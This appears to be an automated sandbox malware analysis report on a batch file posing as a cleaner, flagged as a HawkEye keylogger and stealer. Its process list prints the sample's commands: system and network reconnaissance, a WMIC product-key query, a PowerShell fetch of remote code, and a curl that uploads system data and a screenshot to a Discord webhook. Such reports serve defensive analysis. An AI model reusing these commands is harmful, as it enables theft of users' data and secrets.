Malware Analysis Report

2024-09-22 10:48

Sample ID 240714-qfmess1gqq
Target SchooiCleaner_F1.0.bat
SHA256 ab22ed1dc9c0a8eb99a8d0c4e496671c930e07d57b628da59fc30ad0900c6763
Tags
hawkeye execution keylogger spyware stealer trojan
score
10/10


Analysis Overview

score
10/10

SHA256

ab22ed1dc9c0a8eb99a8d0c4e496671c930e07d57b628da59fc30ad0900c6763

Threat Level: Known bad

The file SchooiCleaner_F1.0.bat was found to be: Known bad.

Malicious Activity Summary

hawkeye execution keylogger spyware stealer trojan

HawkEye

Blocklisted process makes network request

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Gathers network information

Gathers system information

Delays execution with timeout.exe

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-07-14 13:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 13:12

Reported

2024-07-14 13:14

Platform

win11-20240709-en

Max time kernel

37s

Max time network

35s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_F1.0.bat"

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\screenCapture.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 492 wrote to memory of 2392 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 492 wrote to memory of 4548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 492 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 492 wrote to memory of 4028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2968 wrote to memory of 1432 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\PING.EXE
PID 2968 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 492 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2816 wrote to memory of 2560 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 492 wrote to memory of 4880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 492 wrote to memory of 3116 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 492 wrote to memory of 232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 492 wrote to memory of 3240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 492 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 492 wrote to memory of 3176 N/A C:\Windows\system32\cmd.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
PID 3176 wrote to memory of 4808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 492 wrote to memory of 724 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
PID 492 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 492 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_F1.0.bat"

C:\Windows\system32\mode.com

mode con cols=80 lines=30

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\chcp.com

chcp 437

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ping -4 -n 1 IMKBEUOX | findstr [

C:\Windows\system32\PING.EXE

ping -4 -n 1 IMKBEUOX

C:\Windows\system32\findstr.exe

findstr [

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Invoke-RestMethod api.ipify.org

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\system32\ipconfig.exe

ipconfig

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

wmic path softwarelicensingservice get OA3xOriginalProductKey

C:\Windows\system32\timeout.exe

timeout /t 5 /NOBREAK

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2100.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP"

C:\Users\Admin\AppData\Local\Temp\screenCapture.exe

screenCapture.exe screenshot.png

C:\Windows\system32\curl.exe

curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:13:16.45 \nUsername: Admin \nComputer Name: IMKBEUOX \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.1.81 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9

C:\Windows\system32\timeout.exe

timeout /t 3

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:49810 tcp
US 162.159.136.232:443 discord.com tcp

Files


C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvfizt1j.dgv.ps1


C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log


C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive


C:\Users\Admin\AppData\Local\Temp\screenCapture.bat


\??\c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP


C:\Users\Admin\AppData\Local\Temp\RES2100.tmp


C:\Users\Admin\AppData\Local\Temp\screenCapture.exe


C:\Users\Admin\AppData\Local\Temp\screenshot.png


C:\Users\Admin\AppData\Local\Temp\liscense.txt


C:\Users\Admin\AppData\Local\Temp\dir.txt


C:\Users\Admin\AppData\Local\Temp\sysinfo.txt


C:\Users\Admin\AppData\Local\Temp\ipconfig.txt
